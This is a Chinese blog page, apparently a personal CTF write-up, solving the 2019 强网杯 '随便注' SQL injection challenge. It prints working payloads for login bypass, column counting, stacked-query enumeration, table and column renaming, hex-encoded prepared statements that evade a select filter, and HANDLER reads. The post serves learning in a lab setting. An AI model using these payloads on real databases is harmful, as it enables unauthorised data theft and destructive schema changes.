<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="这个题目有一点意思，单独放一个方便自己学习">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯 2019_随便注">
<meta property="og:url" content="http://example.com/2021/09/14/[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8/index.html">
<meta property="og:site_name" content="cr0fyの博客">
<meta property="og:description" content="这个题目有一点意思，单独放一个方便自己学习">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/images/suibian1.png">
<meta property="og:image" content="http://example.com/images/suibian2.png">
<meta property="og:image" content="http://example.com/images/suibian3.png">
<meta property="og:image" content="http://example.com/images/suibian4.png">
<meta property="og:image" content="http://example.com/images/suibian5.png">
<meta property="og:image" content="http://example.com/images/suibian6.png">
<meta property="og:image" content="http://example.com/images/suibian7.png">
<meta property="og:image" content="http://example.com/images/suibian8.png">
<meta property="article:published_time" content="2021-09-14T02:24:38.000Z">
<meta property="article:modified_time" content="2021-11-21T12:59:40.245Z">
<meta property="article:author" content="cr0fy">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/suibian1.png">

<link rel="canonical" href="http://example.com/2021/09/14/[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>强网杯 2019_随便注 | cr0fyの博客</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="cr0fyの博客" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">cr0fyの博客</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">生如夏花之灿烂，死如秋叶之静美</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/09/14/[%E5%BC%BA%E7%BD%91%E6%9D%AF%202019]%E9%9A%8F%E4%BE%BF%E6%B3%A8/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="cr0fy">
      <meta itemprop="description" content="学而后知">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="cr0fyの博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          强网杯 2019_随便注
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-09-14 10:24:38" itemprop="dateCreated datePublished" datetime="2021-09-14T10:24:38+08:00">2021-09-14</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-11-21 20:59:40" itemprop="dateModified" datetime="2021-11-21T20:59:40+08:00">2021-11-21</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/sql%E6%B3%A8%E5%85%A5/" itemprop="url" rel="index"><span itemprop="name">sql注入</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>这个题目有一点意思，单独放一个方便自己学习</p>
<span id="more"></span>

<h2 id="常规"><a href="#常规" class="headerlink" title="常规"></a>常规</h2><p>开头用万能密码试试水</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin<span class="string">&#x27; or &#x27;</span>1<span class="string">&#x27; = &#x27;</span>1</span><br></pre></td></tr></table></figure>
<p>有回显<br><img src="/images/suibian1.png" alt="suibian1"></p>
<p>测试字段数 </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27; order by 1#</span></span><br></pre></td></tr></table></figure>
<p>到3的时候报错，说明字段数为2<br><img src="/images/suibian2.png" alt="Alt text"></p>
<p>下一步尝试union注入</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27; union select 1,2#</span></span><br></pre></td></tr></table></figure>
<p>发现报错，并得知过滤的关键字<br><img src="/images/suibian3.png" alt="Alt text"></p>
<p>看了大佬博客得知用堆叠注入（通过’;’注入多条SQL语句）</p>
<p>先爆数据库</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27;;show databases;#</span></span><br></pre></td></tr></table></figure>
<p><img src="/images/suibian4.png" alt="Alt text"></p>
<p>然后爆表</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27;;show tables;#</span></span><br></pre></td></tr></table></figure>
<p><img src="/images/suibian5.png" alt="Alt text"></p>
<p>这里有两个表<br>先尝试words表</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27;;show columns from words;#</span></span><br></pre></td></tr></table></figure>
<p><img src="/images/suibian6.png" alt="Alt text"></p>
<p>然后爆1919810931114514表<br>要注意当表名为数字的时候，需要用反引号包起来查询</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27;;show columns from `1919810931114514`;#</span></span><br></pre></td></tr></table></figure>
<p><img src="/images/suibian7.png" alt="Alt text"></p>
<p>这个时候普通方法结束了，需要整一点骚操作</p>
<p>在网上借鉴了大佬博客，发现有三种解题方法</p>
<h2 id="解法1"><a href="#解法1" class="headerlink" title="解法1"></a>解法1</h2><h3 id="使用rename把words表改为其他表名。"><a href="#使用rename把words表改为其他表名。" class="headerlink" title="使用rename把words表改为其他表名。"></a>使用rename把words表改为其他表名。</h3><h3 id="把1919810931114514表的名字改为words"><a href="#把1919810931114514表的名字改为words" class="headerlink" title="把1919810931114514表的名字改为words."></a>把1919810931114514表的名字改为words.</h3><h3 id="将flag名改为id"><a href="#将flag名改为id" class="headerlink" title="将flag名改为id"></a>将flag名改为id</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27; ; rename table words to word1 ; rename table `1919810931114514` to words ; alter table words change flag id varchar(100);#</span></span><br></pre></td></tr></table></figure>
<p><img src="/images/suibian8.png" alt="Alt text"></p>
<h2 id="解法2"><a href="#解法2" class="headerlink" title="解法2"></a>解法2</h2><p>因为select被过滤，将select * from <code>1919810931114514</code>进行16进制编码<br>构造payload得到</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27;;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#</span></span><br></pre></td></tr></table></figure>
<h3 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h3><p>1.prepare…from…是预处理语句，会进行编码转换。<br>2.execute用来执行由SQLPrepare创建的SQL语句。<br>3.SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。</p>
<h2 id="解法3"><a href="#解法3" class="headerlink" title="解法3"></a>解法3</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27;; handler `1919810931114514` open as `a`; handler `a` read next;#</span></span><br></pre></td></tr></table></figure>

<p><code>HANDLER ... OPEN</code>语句打开一个表，使其可以使用后续<code>HANDLER ... READ</code>语句访问，该表对象未被其他会话共享，并且在会话调用<code>HANDLER ... CLOSE</code>或会话终止之前不会关闭</p>
<h2 id="知识点总结"><a href="#知识点总结" class="headerlink" title="知识点总结"></a>知识点总结</h2><h3 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1<span class="string">&#x27;;show databases;# //数据库</span></span><br><span class="line"><span class="string">1&#x27;</span>;show tables;<span class="comment">#  //表名</span></span><br><span class="line">1<span class="string">&#x27;;show columns from table;#   //字段</span></span><br></pre></td></tr></table></figure>

<h3 id="修改表名和字段名"><a href="#修改表名和字段名" class="headerlink" title="修改表名和字段名"></a>修改表名和字段名</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">//改列名</span><br><span class="line">alter table &quot; table_name&quot; change &quot; column1&quot; &quot; column2&quot; type;</span><br><span class="line"></span><br><span class="line">alter table &quot;table_name&quot; rename &quot;column1&quot; to &quot;column2&quot;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">//把table_name表下的column改名为new_column</span><br><span class="line">alter table &#x27;table_name&#x27; change &#x27;column&#x27; &#x27;new_column&#x27; type;</span><br><span class="line"></span><br><span class="line">//添加一个列</span><br><span class="line">alter table &quot; table_name&quot; add &quot; column_name&quot;  type;</span><br><span class="line"></span><br><span class="line">//删除一个列</span><br><span class="line">alter table &quot; table_name&quot; drop &quot; column_name&quot;  type;</span><br><span class="line"></span><br><span class="line">//改变列的数据类型</span><br><span class="line">alter table &quot; table_name&quot; alter column &quot; column_name&quot; type;</span><br></pre></td></tr></table></figure>




















    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/09/04/2021%E4%BA%91%E7%88%86%E6%9D%AF_%E5%9B%9B%E6%A0%A1%E8%81%94%E8%80%83/" rel="prev" title="2021云爆杯_四校联考">
      <i class="fa fa-chevron-left"></i> 2021云爆杯_四校联考
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/09/14/BUU%E5%88%B7%E9%A2%98%E6%97%A5%E8%AE%B0%5B1%5Dweb/" rel="next" title="BUU刷题日记[1]web">
      BUU刷题日记[1]web <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%B8%B8%E8%A7%84"><span class="nav-number">1.</span> <span class="nav-text">常规</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E6%B3%951"><span class="nav-number">2.</span> <span class="nav-text">解法1</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8rename%E6%8A%8Awords%E8%A1%A8%E6%94%B9%E4%B8%BA%E5%85%B6%E4%BB%96%E8%A1%A8%E5%90%8D%E3%80%82"><span class="nav-number">2.1.</span> <span class="nav-text">使用rename把words表改为其他表名。</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%8A%8A1919810931114514%E8%A1%A8%E7%9A%84%E5%90%8D%E5%AD%97%E6%94%B9%E4%B8%BAwords"><span class="nav-number">2.2.</span> <span class="nav-text">把1919810931114514表的名字改为words.</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%B0%86flag%E5%90%8D%E6%94%B9%E4%B8%BAid"><span class="nav-number">2.3.</span> <span class="nav-text">将flag名改为id</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E6%B3%952"><span class="nav-number">3.</span> <span class="nav-text">解法2</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9"><span class="nav-number">3.1.</span> <span class="nav-text">知识点</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E8%A7%A3%E6%B3%953"><span class="nav-number">4.</span> <span class="nav-text">解法3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9F%A5%E8%AF%86%E7%82%B9%E6%80%BB%E7%BB%93"><span class="nav-number">5.</span> <span class="nav-text">知识点总结</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-number">5.1.</span> <span class="nav-text">堆叠注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BF%AE%E6%94%B9%E8%A1%A8%E5%90%8D%E5%92%8C%E5%AD%97%E6%AE%B5%E5%90%8D"><span class="nav-number">5.2.</span> <span class="nav-text">修改表名和字段名</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="cr0fy"
      src="/images/avatar.png">
  <p class="site-author-name" itemprop="name">cr0fy</p>
  <div class="site-description" itemprop="description">学而后知</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">10</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/cr0fy" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;cr0fy" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://eli0t-g.github.io/" title="https:&#x2F;&#x2F;eli0t-g.github.io&#x2F;" rel="noopener" target="_blank">Krito</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://tsuppari404.github.io/" title="https:&#x2F;&#x2F;tsuppari404.github.io" rel="noopener" target="_blank">tsuppari</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://spacey.top/" title="https:&#x2F;&#x2F;spacey.top&#x2F;" rel="noopener" target="_blank">Eli0t</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://n0vice.gitee.io/" title="http:&#x2F;&#x2F;n0vice.gitee.io&#x2F;" rel="noopener" target="_blank">N0vice</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/pmrPMR" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;pmrPMR" rel="noopener" target="_blank">PMR</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/karsa" title="https:&#x2F;&#x2F;www.cnblogs.com&#x2F;karsa" rel="noopener" target="_blank">karsa</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="http://www.darry-long.top/" title="http:&#x2F;&#x2F;www.darry-long.top&#x2F;" rel="noopener" target="_blank">darry</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">cr0fy</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    <script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

    <span id="busuanzi_container_site_pv">总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">总访客数<span id="busuanzi_value_site_uv"></span>人</span>
    <span class="post-meta-divider">|</span>
<!-- 不蒜子计数初始值纠正 -->
<script>
$(document).ready(function() {

    var int = setInterval(fixCount, 50);  // 50ms周期检测函数
    var countOffset = 20000;  // 初始化首次数据

    function fixCount() {            
       if (document.getElementById("busuanzi_container_site_pv").style.display != "none")
        {
            $("#busuanzi_value_site_pv").html(parseInt($("#busuanzi_value_site_pv").html()) + countOffset); 
            clearInterval(int);
        }                  
        if ($("#busuanzi_container_site_pv").css("display") != "none")
        {
            $("#busuanzi_value_site_uv").html(parseInt($("#busuanzi_value_site_uv").html()) + countOffset); // 加上初始数据 
            clearInterval(int); // 停止检测
        }  
    }
       	
});
</script> 


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
  

  <script async src="/js/cursor/fireworks.js"></script>



  <script async src="/js/cursor/fireworks.js"></script>



<script type="text/javascript">
    var OriginTitile=document.title,st;
	document.addEventListener("visibilitychange",function(){
        document.hidden?(document.title="ヽ(●-`Д´-)ノ你要玩捉迷藏嘛",clearTimeout(st)):(document.title="(Ő∀Ő3)ノ好哦！",st=setTimeout(function(){document.title=OriginTitile},3e3))
    })
</script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
